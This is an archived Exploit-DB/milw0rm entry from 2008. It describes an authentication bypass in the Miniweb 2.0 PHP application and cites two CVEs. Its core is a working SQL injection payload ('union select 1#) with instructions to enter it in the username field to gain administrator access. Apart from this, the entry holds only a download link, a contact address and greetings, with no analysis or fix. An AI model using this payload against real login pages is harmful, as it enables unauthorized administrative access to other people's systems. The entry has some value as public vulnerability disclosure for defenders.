Miniweb 2.0 Auth Bypass SQL Injection Vulnerability

2008-12-28T00:00:00
ID EDB-ID:7586
Type exploitdb
Reporter bizzit
Modified 2008-12-28T00:00:00

Description

Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability. CVE-2008-2197,CVE-2008-6582. Webapps exploit for php platform

                                        
                                            ##############################################################################
# Miniweb 2.0 Admin bypass
##############################################################################
# Type:
# 'union select 1#
# in the username field and press login, you are admin!
#
# download: http://www.miniweb2.com/
##############################################################################
# Found by bizzit
#
# Contact: bizzit[at]live.de
##############################################################################
# Greetz to:
# Suicide, ReED, h0yt3r, J0hn^x3r, tmh, n00bor, Five-Three-Nine, electron1x,
# Nazrek, Free-Hack and Sys-Flaw
##############################################################################

# milw0rm.com [2008-12-28]